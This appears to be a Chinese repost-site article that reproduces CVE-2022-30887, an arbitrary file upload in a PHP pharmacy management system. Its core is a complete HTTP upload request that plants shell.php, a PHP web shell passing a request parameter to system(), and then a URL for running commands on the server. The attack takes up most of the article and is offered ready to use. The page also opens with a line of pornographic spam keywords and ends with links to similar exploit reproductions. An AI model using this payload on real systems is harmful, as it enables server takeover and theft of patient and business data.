国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CVE-2022-30887漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了CVE-2022-30887漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

多語言藥房管理系統(tǒng) (MPMS) 是用 PHP 和 MySQL 開發(fā)的, 該軟件的主要目的是在藥房和客戶之間提供一套接口,客戶是該軟件的主要用戶。該軟件有助于為藥房業(yè)務(wù)創(chuàng)建一個(gè)綜合數(shù)據(jù)庫,并根據(jù)到期、產(chǎn)品等各種參數(shù)提供各種報(bào)告。 該CMS中php_action/editProductImage.php存在任意文件上傳漏洞,進(jìn)而導(dǎo)致任意代碼執(zhí)行。

1. 訪問ip:port

CVE-2022-30887漏洞復(fù)現(xiàn)

2.抓包,將抓取到的內(nèi)容替換為如下poc,返回successfully即為上傳成功。

POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 556
Connection: close
Cookie: PHPSESSID=t1jo541l52f76t9upiu0pbqv0c
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"


-----------------------------208935235035266125502673738631--

CVE-2022-30887漏洞復(fù)現(xiàn)

3.訪問ip:port/assets/myimages/shell.php?s=whoami即可執(zhí)行命令

CVE-2022-30887漏洞復(fù)現(xiàn)文章來源地址http://www.zghlxwxcb.cn/news/detail-400616.html

到了這里,關(guān)于CVE-2022-30887漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Nftables棧溢出漏洞(CVE-2022-1015)復(fù)現(xiàn)

    背景介紹 Nftables 是一個(gè)基于內(nèi)核的包過濾框架,用于 Linux操作系統(tǒng)中的網(wǎng)絡(luò)安全和防火墻功能。nftables的設(shè)計(jì)目標(biāo)是提供一種更簡(jiǎn)單、更靈活和更高效的方式來管理網(wǎng)絡(luò)數(shù)據(jù)包的流量。 鉤子點(diǎn)的作用是攔截?cái)?shù)據(jù)包,然后對(duì)數(shù)據(jù)包進(jìn)行修改,比較,丟棄和放行等操作。 Nftable

    2024年02月12日
    瀏覽(21)
  • CVE-2022-33891漏洞原理、環(huán)境搭建和復(fù)現(xiàn)

    CVE-2022-33891漏洞原理、環(huán)境搭建和復(fù)現(xiàn)

    最近有幸參與了某地市的攻防演練,在掃描器漏洞都被提交了之后,大殺器也逐漸開始浮出水面,其中就包含今天的主角:apache spark的rce。 Apache Spark 是專為大規(guī)模數(shù)據(jù)處理而設(shè)計(jì)的快速通用的計(jì)算引擎。與 Hadoop 不同,Spark 和 Scala 能夠緊密集成,其中的 Scala 可以像操作本地

    2024年02月13日
    瀏覽(19)
  • CVE -2022-26134漏洞復(fù)現(xiàn)(Confluence OGNL 注入rce漏洞)

    CVE -2022-26134漏洞復(fù)現(xiàn)(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一個(gè)專業(yè)的企業(yè)知識(shí)管理與協(xié)同軟件,主要用于公司內(nèi)員工創(chuàng)建知識(shí)庫并建立知識(shí)管理流程,也可以用于構(gòu)建企業(yè)wiki。其使用簡(jiǎn)單,但它強(qiáng)大的編輯和站點(diǎn)管理特征能夠幫助團(tuán)隊(duì)成員之間共享信息、文檔協(xié)作、集體討論,信息推送。因此

    2024年02月16日
    瀏覽(19)
  • Django SQL注入漏洞復(fù)現(xiàn) (CVE-2022-28347)

    ? 在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain() 中發(fā)現(xiàn)了SQL注入問題。這是通過傳遞一個(gè)精心編制的字典(帶有字典擴(kuò)展)作為**options參數(shù)來實(shí)現(xiàn)的,并將注入負(fù)載放置在選項(xiàng)名稱中。 2.2 = Django 2.2.28 3.2 = Django 3.2.13 4.0 = Djan

    2024年02月05日
    瀏覽(23)
  • CVE漏洞復(fù)現(xiàn)-CVE-2022-22947-Spring Cloud Gateway RCE

    CVE漏洞復(fù)現(xiàn)-CVE-2022-22947-Spring Cloud Gateway RCE

    微服務(wù)架構(gòu)與Spring Cloud 最開始時(shí),我們開發(fā)java項(xiàng)目時(shí),所有的代碼都在一個(gè)工程里,我們把它稱為單體架構(gòu)。當(dāng)我們的項(xiàng)目的代碼量越來越大時(shí),開發(fā)的成員越來越多時(shí),這時(shí)我們項(xiàng)目的性能以及我們開發(fā)的效率都會(huì)存在非常大的問題,所以對(duì)于這樣的項(xiàng)目,我們需要把它

    2023年04月14日
    瀏覽(26)
  • Microsoft Office MSDT代碼執(zhí)行漏洞(CVE-2022-30190)漏洞復(fù)現(xiàn)

    Microsoft Office MSDT代碼執(zhí)行漏洞(CVE-2022-30190)漏洞復(fù)現(xiàn)

    本文章僅供學(xué)習(xí)和研究使用,嚴(yán)禁使用該文章內(nèi)容對(duì)互聯(lián)網(wǎng)其他應(yīng)用進(jìn)行非法操作,若將其用于非法目的,所造成的后果由您自行承擔(dān),產(chǎn)生的一切風(fēng)險(xiǎn)與本文作者無關(guān),如繼續(xù)閱讀該文章即表明您默認(rèn)遵守該內(nèi)容。 該漏洞首次發(fā)現(xiàn)在2022 年 5 月 27 日,由白俄羅斯的一個(gè) I

    2024年02月06日
    瀏覽(29)
  • 復(fù)現(xiàn)CVE-2022-10270(向日葵遠(yuǎn)程代碼執(zhí)行漏洞)

    復(fù)現(xiàn)CVE-2022-10270(向日葵遠(yuǎn)程代碼執(zhí)行漏洞)

    目錄 引言 漏洞描述 影響版本: 原理: 環(huán)境搭建 手動(dòng)復(fù)現(xiàn) 腳本復(fù)現(xiàn) 修復(fù)建議 ? ? ? ? 本文內(nèi)容僅供學(xué)習(xí)參考,若讀者利用本文內(nèi)容做出違法行為,筆者不提供擔(dān)保?。?! ????????向日葵是一款免費(fèi)的,集遠(yuǎn)程控制電腦手機(jī)、遠(yuǎn)程桌面連接、遠(yuǎn)程開機(jī)、遠(yuǎn)程管理、支持

    2024年02月07日
    瀏覽(22)
  • Fortinet FortiNAC RCE漏洞復(fù)現(xiàn)(CVE-2022-39952)

    ? ? ? FortiNAC(Network Access Control) 是Fortinet的一種零信任網(wǎng)絡(luò)訪問控制解決方案,可增強(qiáng)用戶對(duì)企業(yè)網(wǎng)絡(luò)上的物聯(lián)網(wǎng) (IoT) 設(shè)備的監(jiān)控。NAC 是零信任網(wǎng)絡(luò)訪問安全模型的重要組成部分,在該模型中,IT 團(tuán)隊(duì)可以輕松了解正在訪問網(wǎng)絡(luò)的人員和設(shè)備,以及如何保護(hù)網(wǎng)絡(luò)內(nèi)外的公司資

    2024年02月06日
    瀏覽(23)
  • 漏洞復(fù)現(xiàn):Apache Spark 命令注入(CVE-2022-33891)

    漏洞復(fù)現(xiàn):Apache Spark 命令注入(CVE-2022-33891)

    ? Apache Spark 是專為大規(guī)模數(shù)據(jù)處理而設(shè)計(jì)的快速通用的計(jì)算引擎。Spark是UC Berkeley AMP lab (加州大學(xué)伯克利分校的AMP實(shí)驗(yàn)室)所開源的類Hadoop MapReduce的通用并行框架,Spark,擁有Hadoop MapReduce所具有的優(yōu)點(diǎn);但不同于MapReduce的是——Job中間輸出結(jié)果可以保存在內(nèi)存中,從而不再需

    2024年02月09日
    瀏覽(17)
  • 【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠(yuǎn)程代碼執(zhí)行漏洞 (CVE-2022-30190)

    【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠(yuǎn)程代碼執(zhí)行漏洞 (CVE-2022-30190)

    0x01 Microsoft Office Microsoft Office是由Microsoft(微軟)公司開發(fā)的一套辦公軟件套裝。常用組件有 Word、Excel、PowerPoint等。 0x02 漏洞簡(jiǎn)介 該文檔使用 Word 遠(yuǎn)程模板功能從遠(yuǎn)程網(wǎng)絡(luò)服務(wù)器檢索 HTML 文件,該服務(wù)器使用 ms-msdt MSProtocol URI 方案加載代碼并執(zhí)行 PowerShell,禁用宏,仍能通過

    2024年02月05日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包